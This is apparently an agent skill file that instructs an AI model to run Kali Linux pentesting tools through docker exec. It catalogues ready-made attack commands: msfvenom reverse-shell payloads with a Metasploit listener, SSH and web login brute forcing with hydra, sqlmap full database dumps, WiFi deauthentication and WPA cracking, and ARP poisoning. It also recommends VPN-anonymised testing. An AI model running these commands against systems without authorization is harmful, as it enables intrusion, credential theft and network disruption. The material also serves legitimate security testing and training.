Kali Docker Pentesting Skill

Overview

This skill provides intelligent access to a comprehensive Kali Linux Docker container with 200+ pentesting tools. Instead of using an MCP server, this skill enables direct command execution via bash_tool, making it 70% more token-efficient.

---

📁 DATA PERSISTENCE & OUTPUT LOGGING (CRITICAL)

Volume Mount Structure

The container has two persistent volumes that sync with the host:

HOST                          CONTAINER
./shared/           <--->     /home/kaliuser/shared/
./wordlists/        <--->     /home/kaliuser/wordlists/

MANDATORY OUTPUT RULE

⚠️ CRITICAL: ALL scan results, outputs, and findings MUST be saved to /home/kaliuser/shared/

This ensures:

• ✅ Data persists after container restart
• ✅ Results are immediately available on host in ./shared/
• ✅ Complete audit trail for all activities
• ✅ Easy access for reporting and analysis

Output Organization Best Practices

1. Use Timestamps in Filenames

# Generate timestamp
TIMESTAMP=$(date +%Y%m%d_%H%M%S)

# Save with timestamp
docker exec kali nmap -sV 192.168.1.1 -oA /home/kaliuser/shared/nmap_scan_$TIMESTAMP

2. Organize by Tool/Category

# Create organized directory structure
docker exec kali mkdir -p /home/kaliuser/shared/{nmap,gobuster,nikto,sqlmap,hydra,john,metasploit,wireless,forensics}

# Save to organized locations
docker exec kali nmap -sV target.com -oA /home/kaliuser/shared/nmap/scan_$(date +%Y%m%d_%H%M%S)
docker exec kali gobuster dir -u http://target.com -w /wordlist -o /home/kaliuser/shared/gobuster/target_$(date +%Y%m%d_%H%M%S).txt

3. Standard Naming Convention

FORMAT: {tool}_{target}_{type}_{timestamp}.{ext}

EXAMPLES:
- nmap_192.168.1.1_full_20260125_143022.xml
- gobuster_example.com_dirs_20260125_143022.txt
- nikto_target.com_vuln_20260125_143022.txt
- hydra_ssh_192.168.1.10_20260125_143022.txt
- john_hashes_cracked_20260125_143022.txt

Built-in Wordlists vs Custom Wordlists

Built-in Wordlists (Use Directly - No Mount Needed)

# Pre-installed wordlists in container:
/usr/share/wordlists/rockyou.txt          # Most popular passwords (needs extraction)
/usr/share/wordlists/dirb/common.txt      # Common directories
/usr/share/seclists/                      # Full SecLists collection
/usr/share/wordlists/metasploit/          # Metasploit wordlists

# Extract rockyou (one-time operation)
docker exec kali gunzip /usr/share/wordlists/rockyou.txt.gz

# Use built-in wordlists
docker exec kali hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target

Custom Wordlists (Save to Volume)

# Generate custom wordlist and save to mounted volume
docker exec kali crunch 6 8 -o /home/kaliuser/wordlists/custom_6-8.txt
docker exec kali cewl http://target.com -w /home/kaliuser/wordlists/target_words.txt

# Custom wordlists appear in ./wordlists/ on host

Complete Logging Examples

Network Scanning

# Create directory structure
docker exec kali mkdir -p /home/kaliuser/shared/recon/$(date +%Y%m%d)

# Host discovery with logging
docker exec kali bash -c 'nmap -sn 192.168.1.0/24 -oA /home/kaliuser/shared/recon/$(date +%Y%m%d)/host_discovery_$(date +%H%M%S)'

# Port scan with logging
docker exec kali bash -c 'nmap -sV -p- 192.168.1.100 -oA /home/kaliuser/shared/recon/$(date +%Y%m%d)/port_scan_192.168.1.100_$(date +%H%M%S)'

Web Application Testing

# Create web assessment directory
docker exec kali mkdir -p /home/kaliuser/shared/web/target.com

# Directory enumeration
docker exec kali gobuster dir -u http://target.com \
  -w /usr/share/wordlists/dirb/common.txt \
  -o /home/kaliuser/shared/web/target.com/gobuster_$(date +%Y%m%d_%H%M%S).txt

# Nikto scan
docker exec kali nikto -h http://target.com \
  -o /home/kaliuser/shared/web/target.com/nikto_$(date +%Y%m%d_%H%M%S).txt

# SQL injection testing
docker exec kali sqlmap -u "http://target.com/page?id=1" --batch \
  --output-dir=/home/kaliuser/shared/web/target.com/sqlmap_$(date +%Y%m%d_%H%M%S)

Password Cracking

# Create password cracking directory
docker exec kali mkdir -p /home/kaliuser/shared/passwords

# John the Ripper with logging
docker exec kali john /home/kaliuser/shared/passwords/hashes.txt \
  --wordlist=/usr/share/wordlists/rockyou.txt \
  > /home/kaliuser/shared/passwords/john_output_$(date +%Y%m%d_%H%M%S).txt

# Hydra brute force with logging
docker exec kali hydra -l admin -P /usr/share/wordlists/rockyou.txt \
  ssh://192.168.1.10 \
  -o /home/kaliuser/shared/passwords/hydra_ssh_$(date +%Y%m%d_%H%M%S).txt

Wireless Attacks

# Create wireless directory
docker exec kali mkdir -p /home/kaliuser/shared/wireless

# Capture handshake
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF \
  -w /home/kaliuser/shared/wireless/capture_$(date +%Y%m%d_%H%M%S) wlan0mon

# Crack WPA
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt \
  /home/kaliuser/shared/wireless/capture_*.cap \
  | tee /home/kaliuser/shared/wireless/crack_result_$(date +%Y%m%d_%H%M%S).txt

Exploitation & Payloads

# Create payloads directory
docker exec kali mkdir -p /home/kaliuser/shared/payloads

# Generate payload and save to shared volume
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 -f exe \
  -o /home/kaliuser/shared/payloads/payload_$(date +%Y%m%d_%H%M%S).exe

# Metasploit resource file logging
docker exec kali bash -c 'echo "spool /home/kaliuser/shared/payloads/msf_session_$(date +%Y%m%d_%H%M%S).log" > /tmp/msf.rc'

Accessing Results on Host

# View all saved results
ls -lh ./shared/

# View organized by date
tree ./shared/

# Search for specific scan
find ./shared/ -name "*nmap*" -type f

# Archive results
tar -czf pentest_results_$(date +%Y%m%d).tar.gz ./shared/

Quick Reference: Output Flags by Tool

# Nmap
-oN file.txt        # Normal output
-oX file.xml        # XML output
-oA basename        # All formats (recommended)

# Gobuster
-o file.txt         # Output to file

# Nikto
-o file.txt         # Output to file

# SQLmap
--output-dir=path   # Output directory

# Hydra
-o file.txt         # Output to file

# John
> file.txt          # Redirect stdout

# Aircrack-ng
-w /path/to/file    # Output file (for airodump-ng)

# Metasploit
spool file.log      # Log session to file

---

Container Management

Starting the Container

The container is managed via docker-compose with automatic volume mounting:

# Start with VPN (recommended for anonymized testing)
docker-compose up -d

# Start without VPN (direct connection)
docker-compose up -d kali

# Build from scratch
docker-compose build

# Check status
docker-compose ps

Volume mounts are automatic:

• ./shared/ → /home/kaliuser/shared/ (all scan results & outputs)
• ./wordlists/ → /home/kaliuser/wordlists/ (custom wordlists only)

Running Commands

# Execute single command
docker exec kali [tool] [options]

# Interactive shell
docker exec -it kali /bin/bash

# Copy files out
docker cp kali:/home/kaliuser/shared/scan.txt ./output/

# Copy files in
docker cp ./wordlist.txt kali:/home/kaliuser/shared/

Container Lifecycle

# Stop container
docker stop kali

# Start existing container
docker start kali

# Remove container
docker rm kali

# View logs
docker logs kali

---

Tool Catalog

🔍 Network Discovery & Scanning

nmap - Network Mapper

Description: Industry-standard network scanner for host discovery, port scanning, and service detection.

Usage:

# Basic scan
docker exec kali nmap 192.168.1.1

# Service version detection
docker exec kali nmap -sV 192.168.1.1

# OS detection
docker exec kali nmap -O 192.168.1.1

# Comprehensive scan
docker exec kali nmap -sC -sV -O -p- 192.168.1.1

# Save results (ALWAYS use /home/kaliuser/shared/)
docker exec kali bash -c 'nmap -sV -oA /home/kaliuser/shared/nmap_scan_$(date +%Y%m%d_%H%M%S) 192.168.1.0/24'

Common Options:

• -sS - SYN stealth scan
• -sT - TCP connect scan
• -sU - UDP scan
• -sV - Version detection
• -O - OS detection
• -A - Aggressive scan (OS, version, scripts, traceroute)
• -p- - Scan all 65535 ports
• -Pn - Skip ping (assume host is up)
• -T4 - Faster timing (0-5)
• -oA - Output all formats

masscan - Fast Port Scanner

Description: Extremely fast port scanner, can scan the entire internet in under 6 minutes.

Usage:

# Scan specific ports
docker exec kali masscan 192.168.1.0/24 -p80,443,8080

# Scan all ports fast
docker exec kali masscan 192.168.1.0/24 -p0-65535 --rate=10000

# Save results
docker exec kali masscan 10.0.0.0/8 -p80 -oL /home/kaliuser/shared/masscan.txt

netdiscover - Network Discovery

Description: Active/passive ARP reconnaissance tool.

Usage:

# Passive mode
docker exec kali netdiscover -p -i eth0

# Active mode with range
docker exec kali netdiscover -r 192.168.1.0/24

arp-scan - ARP Scanner

Description: Discovers IPv4 hosts using ARP.

Usage:

docker exec kali arp-scan --localnet
docker exec kali arp-scan 192.168.1.0/24

---

🌐 Web Application Testing

nikto - Web Server Scanner

Description: Web server vulnerability scanner.

Usage:

# Basic scan
docker exec kali nikto -h http://target.com

# SSL scan
docker exec kali nikto -h https://target.com -ssl

# Save results
docker exec kali nikto -h http://target.com -o /home/kaliuser/shared/nikto.txt

# Tuning options
docker exec kali nikto -h http://target.com -Tuning 123bde

dirb - Directory Brute Forcer

Description: Web content scanner.

Usage:

# Default wordlist
docker exec kali dirb http://target.com

# Custom wordlist
docker exec kali dirb http://target.com /usr/share/wordlists/dirb/common.txt

# Save results
docker exec kali dirb http://target.com -o /home/kaliuser/shared/dirb.txt

# Extensions
docker exec kali dirb http://target.com -X .php,.html,.txt

gobuster - Directory/DNS Enumeration

Description: Fast directory and DNS enumeration tool.

Usage:

# Directory enumeration
docker exec kali gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt

# DNS subdomain enumeration
docker exec kali gobuster dns -d target.com -w /usr/share/wordlists/subdomains.txt

# Virtual host discovery
docker exec kali gobuster vhost -u http://target.com -w /usr/share/wordlists/vhosts.txt

wfuzz - Web Fuzzer

Description: Web application fuzzer.

Usage:

# Directory fuzzing
docker exec kali wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt --hc 404 http://target.com/FUZZ

# Parameter fuzzing
docker exec kali wfuzz -c -z file,/usr/share/wordlists/passwords.txt http://target.com/page?id=FUZZ

# POST data fuzzing
docker exec kali wfuzz -c -z file,users.txt -z file,pass.txt -d "user=FUZZ&pass=FUZ2Z" http://target.com/login

sqlmap - SQL Injection Tool

Description: Automatic SQL injection and database takeover tool.

Usage:

# Basic test
docker exec kali sqlmap -u "http://target.com/page?id=1"

# POST request
docker exec kali sqlmap -u "http://target.com/login" --data="user=admin&pass=test"

# Enumerate databases
docker exec kali sqlmap -u "http://target.com/page?id=1" --dbs

# Dump database
docker exec kali sqlmap -u "http://target.com/page?id=1" -D dbname --dump

# Full automation
docker exec kali sqlmap -u "http://target.com/page?id=1" --batch --dump-all

wpscan - WordPress Scanner

Description: WordPress vulnerability scanner.

Usage:

# Basic scan
docker exec kali wpscan --url http://target.com

# Enumerate users
docker exec kali wpscan --url http://target.com --enumerate u

# Enumerate plugins
docker exec kali wpscan --url http://target.com --enumerate p

# Aggressive scan
docker exec kali wpscan --url http://target.com --enumerate ap,at,cb,dbe

whatweb - Website Fingerprinting

Description: Identifies websites and web technologies.

Usage:

# Basic scan
docker exec kali whatweb http://target.com

# Aggressive mode
docker exec kali whatweb -a 3 http://target.com

# Scan multiple URLs
docker exec kali whatweb -i /home/kaliuser/shared/urls.txt

---

🔐 Password Attacks

john - John the Ripper

Description: Fast password cracker.

Usage:

# Crack with default wordlist
docker exec kali john /home/kaliuser/shared/hashes.txt

# Use rockyou wordlist
docker exec kali john --wordlist=/usr/share/wordlists/rockyou.txt /home/kaliuser/shared/hashes.txt

# Crack specific format
docker exec kali john --format=raw-md5 /home/kaliuser/shared/hashes.txt

# Show cracked passwords
docker exec kali john --show /home/kaliuser/shared/hashes.txt

# Incremental mode
docker exec kali john --incremental /home/kaliuser/shared/hashes.txt

hashcat - Advanced Password Recovery

Description: World's fastest password cracker.

Usage:

# MD5 crack
docker exec kali hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt

# SHA256 crack
docker exec kali hashcat -m 1400 -a 0 hashes.txt wordlist.txt

# Brute force
docker exec kali hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a

# Show results
docker exec kali hashcat -m 0 hashes.txt --show

Hash Modes:

• 0 = MD5
• 100 = SHA1
• 1400 = SHA256
• 1700 = SHA512
• 1000 = NTLM
• 3200 = bcrypt

hydra - Network Password Cracker

Description: Fast network logon cracker.

Usage:

# SSH brute force
docker exec kali hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1

# HTTP POST form
docker exec kali hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"

# FTP brute force
docker exec kali hydra -L users.txt -P passwords.txt ftp://192.168.1.1

# Multiple protocols
docker exec kali hydra -L users.txt -P passwords.txt 192.168.1.1 ssh ftp http

medusa - Parallel Password Cracker

Description: Speedy, parallel, modular login brute-forcer.

Usage:

# SSH attack
docker exec kali medusa -h 192.168.1.1 -u admin -P passwords.txt -M ssh

# HTTP basic auth
docker exec kali medusa -h 192.168.1.1 -u admin -P passwords.txt -M http

crunch - Wordlist Generator

Description: Generates custom wordlists.

Usage:

# Generate 6-8 character wordlist
docker exec kali crunch 6 8 -o /home/kaliuser/shared/wordlist.txt

# Custom charset
docker exec kali crunch 4 6 0123456789 -o /home/kaliuser/shared/numbers.txt

# Pattern-based
docker exec kali crunch 8 8 -t pass@@@@ -o /home/kaliuser/shared/pattern.txt

---

📡 Wireless Security

aircrack-ng - WiFi Security Suite

Description: Complete suite for assessing WiFi network security.

Usage:

# Start monitor mode
docker exec kali airmon-ng start wlan0

# Capture packets
docker exec kali airodump-ng wlan0mon

# Capture specific network
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /home/kaliuser/shared/capture wlan0mon

# Deauth attack
docker exec kali aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# Crack WPA handshake
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/kaliuser/shared/capture-01.cap

wifite - Automated Wireless Attack

Description: Automated wireless attack tool.

Usage:

# Automatic WPA attack
docker exec kali wifite --wpa

# All attack types
docker exec kali wifite

# Specific target
docker exec kali wifite -i wlan0 --kill

reaver - WPS Attack

Description: Brute force WPS PINs.

Usage:

docker exec kali reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

---

🕵️ Information Gathering

theharvester - Email/Subdomain Harvester

Description: Gather emails, subdomains, IPs from public sources.

Usage:

# Search all sources
docker exec kali theharvester -d target.com -b all

# Specific source
docker exec kali theharvester -d target.com -b google

# Save results
docker exec kali theharvester -d target.com -b all -f /home/kaliuser/shared/harvest

dnsrecon - DNS Enumeration

Description: DNS enumeration and network reconnaissance.

Usage:

# Standard enumeration
docker exec kali dnsrecon -d target.com

# Zone transfer
docker exec kali dnsrecon -d target.com -a

# Brute force subdomains
docker exec kali dnsrecon -d target.com -D /usr/share/wordlists/subdomains.txt -t brt

sublist3r - Subdomain Enumeration

Description: Fast subdomain enumeration using OSINT.

Usage:

# Basic enumeration
docker exec kali sublist3r -d target.com

# Enable brute force
docker exec kali sublist3r -d target.com -b

# Save results
docker exec kali sublist3r -d target.com -o /home/kaliuser/shared/subdomains.txt

enum4linux - SMB Enumeration

Description: Tool for enumerating information from Windows and Samba systems.

Usage:

# Full enumeration
docker exec kali enum4linux -a 192.168.1.1

# User enumeration
docker exec kali enum4linux -U 192.168.1.1

# Share enumeration
docker exec kali enum4linux -S 192.168.1.1

dmitry - Deep Information Gathering

Description: Deepmagic Information Gathering Tool.

Usage:

# Full scan
docker exec kali dmitry -winsepo /home/kaliuser/shared/dmitry.txt target.com

# Subdomain search
docker exec kali dmitry -s target.com

---

🛡️ Exploitation Frameworks

metasploit-framework - Penetration Testing Framework

Description: The world's most used penetration testing framework.

Usage:

# Start msfconsole
docker exec -it kali msfconsole

# Generate payload
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > /home/kaliuser/shared/payload.exe

# Search exploits
docker exec -it kali bash -c "echo 'search tomcat' | msfconsole -q"

# Run resource script
docker exec kali msfconsole -r /home/kaliuser/shared/script.rc

Common msfvenom payloads:

# Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe -o shell.exe

# Linux reverse shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f elf -o shell.elf

# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw -o shell.php

# Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -o shell.apk

social-engineer-toolkit (SET)

Description: Social engineering penetration testing framework.

Usage:

# Start SET
docker exec -it kali setoolkit

---

🔬 Forensics & Analysis

binwalk - Firmware Analysis

Description: Analyze and extract firmware images.

Usage:

# Scan for embedded files
docker exec kali binwalk /home/kaliuser/shared/firmware.bin

# Extract files
docker exec kali binwalk -e /home/kaliuser/shared/firmware.bin

# Signature scan
docker exec kali binwalk --signature /home/kaliuser/shared/file.bin

foremost - File Carving

Description: Recover files based on headers and footers.

Usage:

# Recover all file types
docker exec kali foremost -i /home/kaliuser/shared/image.dd -o /home/kaliuser/shared/recovered

# Specific file types
docker exec kali foremost -t jpg,png,pdf -i /home/kaliuser/shared/image.dd -o /home/kaliuser/shared/

volatility - Memory Forensics

Description: Advanced memory forensics framework.

Usage:

# Get image info
docker exec kali volatility -f /home/kaliuser/shared/memory.dump imageinfo

# List processes
docker exec kali volatility -f /home/kaliuser/shared/memory.dump --profile=Win7SP1x64 pslist

# Dump process
docker exec kali volatility -f /home/kaliuser/shared/memory.dump --profile=Win7SP1x64 procdump -p 1234 -D /home/kaliuser/shared/

strings - Extract Strings

Description: Extract printable strings from files.

Usage:

# Basic extraction
docker exec kali strings /home/kaliuser/shared/binary > /home/kaliuser/shared/strings.txt

# Minimum length 10
docker exec kali strings -n 10 /home/kaliuser/shared/binary

# Unicode strings
docker exec kali strings -e l /home/kaliuser/shared/binary

exiftool - Metadata Extraction

Description: Read and write meta information in files.

Usage:

# View metadata
docker exec kali exiftool /home/kaliuser/shared/image.jpg

# Remove all metadata
docker exec kali exiftool -all= /home/kaliuser/shared/image.jpg

# Batch process
docker exec kali exiftool /home/kaliuser/shared/*.jpg

---

🔄 Reverse Engineering

ghidra - Software Reverse Engineering

Description: NSA's software reverse engineering framework.

Usage:

# GUI mode (requires X11 forwarding)
docker exec -it kali ghidra

# Headless mode
docker exec kali analyzeHeadless /workspace /project -import /home/kaliuser/shared/binary.exe

radare2 - Reverse Engineering Framework

Description: Advanced reverse engineering framework.

Usage:

# Open binary
docker exec -it kali r2 /home/kaliuser/shared/binary

# Analyze
docker exec -it kali bash -c "echo 'aaa; pdf' | r2 /home/kaliuser/shared/binary"

# Disassemble
docker exec kali r2 -c 'pd 10' /home/kaliuser/shared/binary

gdb - GNU Debugger

Description: Standard debugger for Unix systems.

Usage:

# Debug binary
docker exec -it kali gdb /home/kaliuser/shared/binary

# With PEDA
docker exec -it kali gdb -q /home/kaliuser/shared/binary

---

🎯 Vulnerability Assessment

lynis - Security Auditing

Description: Security auditing tool for Unix/Linux systems.

Usage:

# Full audit
docker exec kali lynis audit system

# Quick scan
docker exec kali lynis audit system --quick

nikto - Web Vulnerability Scanner

(See Web Application Testing section)

openvas - Vulnerability Scanner

Description: Full-featured vulnerability scanner.

Usage:

# Start OpenVAS (requires initialization)
docker exec kali openvas-start

---

📊 Network Analysis

tcpdump - Packet Capture

Description: Command-line packet analyzer.

Usage:

# Capture on interface
docker exec kali tcpdump -i eth0

# Capture to file
docker exec kali tcpdump -i eth0 -w /home/kaliuser/shared/capture.pcap

# Read file
docker exec kali tcpdump -r /home/kaliuser/shared/capture.pcap

# Filter HTTP
docker exec kali tcpdump -i eth0 'tcp port 80'

tshark - Network Protocol Analyzer

Description: Terminal-based Wireshark.

Usage:

# Capture packets
docker exec kali tshark -i eth0

# Capture to file
docker exec kali tshark -i eth0 -w /home/kaliuser/shared/capture.pcap

# Filter display
docker exec kali tshark -r /home/kaliuser/shared/capture.pcap -Y 'http.request'

ettercap - Network Sniffer/Interceptor

Description: Comprehensive suite for MITM attacks.

Usage:

# Text mode
docker exec -it kali ettercap -T -i eth0

# ARP poisoning
docker exec kali ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//

---

Common Pentesting Workflows

1. Network Reconnaissance

# Step 1: Discover live hosts
docker exec kali nmap -sn 192.168.1.0/24 -oA /home/kaliuser/shared/hosts

# Step 2: Port scan discovered hosts
docker exec kali nmap -sV -p- -iL /home/kaliuser/shared/hosts.txt -oA /home/kaliuser/shared/ports

# Step 3: Enumerate services
docker exec kali nmap -sC -sV -p 80,443,22,21 192.168.1.0/24 -oA /home/kaliuser/shared/services

2. Web Application Assessment

# Step 1: Identify web technologies
docker exec kali whatweb http://target.com

# Step 2: Directory enumeration
docker exec kali gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -o /home/kaliuser/shared/dirs.txt

# Step 3: Vulnerability scan
docker exec kali nikto -h http://target.com -o /home/kaliuser/shared/nikto.txt

# Step 4: Test for SQLi
docker exec kali sqlmap -u "http://target.com/page?id=1" --batch

3. Password Cracking Workflow

# Step 1: Generate wordlist
docker exec kali crunch 8 12 -t Pass@@@@ -o /home/kaliuser/shared/wordlist.txt

# Step 2: Crack hashes
docker exec kali john --wordlist=/home/kaliuser/shared/wordlist.txt /home/kaliuser/shared/hashes.txt

# Step 3: Network service brute force
docker exec kali hydra -L /home/kaliuser/shared/users.txt -P /home/kaliuser/shared/wordlist.txt ssh://192.168.1.1

4. Wireless Network Assessment

# Step 1: Enable monitor mode
docker exec kali airmon-ng start wlan0

# Step 2: Scan networks
docker exec kali airodump-ng wlan0mon

# Step 3: Capture handshake
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /home/kaliuser/shared/capture wlan0mon

# Step 4: Deauth clients
docker exec kali aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon

# Step 5: Crack WPA
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/kaliuser/shared/capture-01.cap

5. Exploitation Workflow

# Step 1: Search for exploit
docker exec kali searchsploit apache 2.4.49

# Step 2: Generate payload
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /home/kaliuser/shared/payload.exe

# Step 3: Setup listener in Metasploit
docker exec -it kali msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; exploit"

---

File Management

Copying Files Between Host and Container

Note: Files in mounted volumes are automatically synced - no need to use docker cp!

# Files are automatically available on both sides:
# Save in container → Appears in ./shared/ on host immediately
docker exec kali nmap -sV target -oA /home/kaliuser/shared/scan

# Access on host
cat ./shared/scan.nmap

# Add files from host → Available in container immediately
echo "target1.com" > ./shared/targets.txt
docker exec kali cat /home/kaliuser/shared/targets.txt

# Only use docker cp for non-mounted paths
docker cp kali:/tmp/some-file.txt ./
docker cp ./local-file.txt kali:/tmp/

Working with Wordlists

Common Wordlist Locations:

• /usr/share/wordlists/rockyou.txt - Most popular password list
• /usr/share/wordlists/dirb/common.txt - Common directories
• /usr/share/seclists/ - SecLists collection
• /usr/share/wordlists/metasploit/ - Metasploit wordlists

# List available wordlists
docker exec kali find /usr/share/wordlists -type f

# Extract rockyou (if gzipped)
docker exec kali gunzip /usr/share/wordlists/rockyou.txt.gz

---

Troubleshooting

Container Won't Start

# Check logs
docker logs kali

# Remove and recreate
docker rm kali
docker run -d --name kali kali-comprehensive

Network Issues

# Use host network
docker run -d --name kali --network host kali-comprehensive

# Add network capabilities
docker run -d --name kali --cap-add=NET_RAW --cap-add=NET_ADMIN kali-comprehensive

Permission Issues

# Run as root (already default)
docker exec -u root kali [command]

# Fix workspace permissions
docker exec kali chmod -R 777 /workspace /results

Metasploit Database Issues

# Initialize database
docker exec kali service postgresql start
docker exec kali msfdb init

# Check status
docker exec kali msfdb status

---

Best Practices

1. ALWAYS Save Results to /home/kaliuser/shared/

MANDATORY: Every command MUST save output to the shared volume with timestamps:

# ✅ CORRECT - Output saved to shared volume with timestamp
docker exec kali bash -c 'nmap -sV target -oA /home/kaliuser/shared/scan_$(date +%Y%m%d_%H%M%S)'

# ❌ WRONG - Output not saved (lost on container restart)
docker exec kali nmap -sV target

# ✅ CORRECT - Redirect to shared volume
docker exec kali whatweb target.com | tee /home/kaliuser/shared/whatweb_$(date +%Y%m%d_%H%M%S).txt

# Standard output flags (always use /home/kaliuser/shared/)
-o /home/kaliuser/shared/file_$(date +%Y%m%d_%H%M%S).txt     # Generic output
-oA /home/kaliuser/shared/scan_$(date +%Y%m%d_%H%M%S)        # Nmap: all formats
-w /home/kaliuser/shared/capture_$(date +%Y%m%d_%H%M%S).pcap # Capture files

2. Organize by Tool and Date

Create organized directories for better result management:

# Create directory structure
docker exec kali mkdir -p /home/kaliuser/shared/{nmap,web,passwords,wireless,exploitation}/$(date +%Y%m%d)

# Save to organized locations
docker exec kali bash -c 'nmap -sV target -oA /home/kaliuser/shared/nmap/$(date +%Y%m%d)/scan_$(date +%H%M%S)'

Mounted volumes:

• ./shared/ ↔ /home/kaliuser/shared/ - ALL scan results and outputs (MANDATORY)
• ./wordlists/ ↔ /home/kaliuser/wordlists/ - Custom wordlists only
• Built-in wordlists: /usr/share/wordlists/ (rockyou, seclists, dirb, etc.)

3. Scope Your Testing

Always:

• Get written authorization
• Define scope boundaries
• Document everything
• Report findings responsibly

4. Clean Up After Testing

# Stop monitor mode
docker exec kali airmon-ng stop wlan0mon

# Clear temporary files
docker exec kali rm -rf /tmp/*

# Archive results
docker exec kali tar -czf /home/kaliuser/shared/assessment-$(date +%Y%m%d).tar.gz /home/kaliuser/shared/*.txt

---

Quick Reference

Port Scanning

docker exec kali nmap -sV -p- target

Directory Enumeration

docker exec kali gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt

SQL Injection

docker exec kali sqlmap -u "http://target/page?id=1" --batch

Password Cracking

docker exec kali john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Network Brute Force

docker exec kali hydra -l admin -P passwords.txt ssh://target

WiFi Cracking

docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt capture.cap

---

When to Use This Skill

Use this skill when:

• Conducting authorized penetration testing
• Performing security assessments
• Testing network security
• Analyzing web applications
• Cracking passwords (authorized)
• Wireless security auditing
• Forensics analysis
• Reverse engineering
• Learning security techniques

Claude will read this skill and execute commands via bash_tool, providing efficient, direct access to all pentesting tools without MCP protocol overhead.